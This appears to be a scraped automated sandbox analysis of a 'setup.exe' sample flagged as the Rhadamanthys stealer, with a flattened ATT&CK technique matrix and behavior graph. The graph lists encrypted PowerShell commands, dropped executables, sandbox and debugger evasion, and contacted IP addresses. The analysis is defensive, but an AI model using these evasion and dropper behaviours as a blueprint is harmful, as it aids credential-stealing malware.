                        File and Directory Discovery
                        SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCron1
                        Registry Run Keys / Startup Folder
                        1
                        Registry Run Keys / Startup Folder
                        12
                        Software Packing
                        NTDS164
                        System Information Discovery
                        Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets461
                        Security Software Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion
                        Cached Domain Credentials2
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items23
                        Masquerading
                        DCSync71
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job71
                        Virtualization/Sandbox Evasion
                        Proc Filesystem1
                        Application Window Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                        Process Injection
                        /etc/passwd and /etc/shadow1
                        Remote System Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1468866 Sample: setup.exe Startdate: 08/07/2024 Architecture: WINDOWS Score: 100 115 Antivirus / Scanner detection for submitted sample 2->115 117 Multi AV Scanner detection for submitted file 2->117 119 Yara detected RHADAMANTHYS Stealer 2->119 121 9 other signatures 2->121 10 setup.exe 2 2->10         started        14 msiexec.exe 2->14         started        16 svchost.exe 2->16         started        process3 dnsIp4 89 C:\Users\user\AppData\Local\...\setup.exe.log, CSV 10->89 dropped 137 Encrypted powershell cmdline option found 10->137 19 powershell.exe 14 29 10->19         started        91 C:\Program Files\nodejs\...\semver.js, a 14->91 dropped 93 C:\...\macOS_Catalina_acid_test.sh, Bourne-Again 14->93 dropped 95 C:\Program Files\nodejs\...\test_gyp.py, Python 14->95 dropped 97 66 other files (none is malicious) 14->97 dropped 24 msiexec.exe 14->24         started        26 msiexec.exe 14->26         started        28 msiexec.exe 14->28         started        99 184.28.90.27 AKAMAI-ASUS United States 16->99 101 127.0.0.1 unknown unknown 16->101 file5 signatures6 process7 dnsIp8 103 164.132.58.105 OVHFR France 19->103 105 104.192.141.1 AMAZON-02US United States 19->105 81 C:\Users\user\AppData\...\okdtlfsk.k4u3.exe, PE32 19->81 dropped 83 C:\Users\user\AppData\...\okdtlfsk.k4u2.exe, PE32 19->83 dropped 85 C:\Users\user\AppData\...\okdtlfsk.k4u1.exe, PE32 19->85 dropped 87 C:\Users\user\AppData\...\okdtlfsk.k4u0.exe, PE32 19->87 dropped 123 Potential dropper URLs found in powershell memory 19->123 125 Loading BitLocker PowerShell Module 19->125 127 Powershell drops PE file 19->127 30 okdtlfsk.k4u1.exe 1 19->30         started        33 okdtlfsk.k4u3.exe 12 259 19->33         started        36 okdtlfsk.k4u2.exe 8 19->36         started        38 2 other processes 19->38 file9 signatures10 process11 file12 139 Switches to a custom stack to bypass stack traces 30->139 40 OpenWith.exe 30->40         started        71 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 33->71 dropped 73 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 33->73 dropped 75 C:\Users\user\AppData\Local\...\System.dll, PE32 33->75 dropped 79 17 other files (none is malicious) 33->79 dropped 141 Drops large PE files 33->141 43 Steam.exe 33->43         started        77 C:\Users\user\AppData\Local\Temp\...\2032.bat, Unicode 36->77 dropped 45 cmd.exe 36->45         started        143 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 38->143 145 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 38->145 47 conhost.exe 38->47         started        signatures13 process14 signatures15 129 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 40->129 131 Checks if the current machine is a virtual machine (disk enumeration) 40->131 133 Switches to a custom stack to bypass stack traces 40->133 49 cscript.exe 43->49         started        52 cscript.exe 43->52         started        54 Steam.exe 43->54         started        57 Steam.exe 43->57         started        135 Suspicious powershell command line found 45->135 59 powershell.exe 45->59         started        61 conhost.exe 45->61         started        63 where.exe 45->63         started        65 2 other processes 45->65 process16 dnsIp17 113 Writes or reads registry keys via WMI 49->113 67 conhost.exe 49->67         started        69 conhost.exe 52->69         started        107 1.1.1.1 CLOUDFLARENETUS Australia 54->107 109 162.159.61.3 CLOUDFLARENETUS United States 54->109 111 104.20.22.46 CLOUDFLARENETUS United States 59->111 signatures18 process19

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.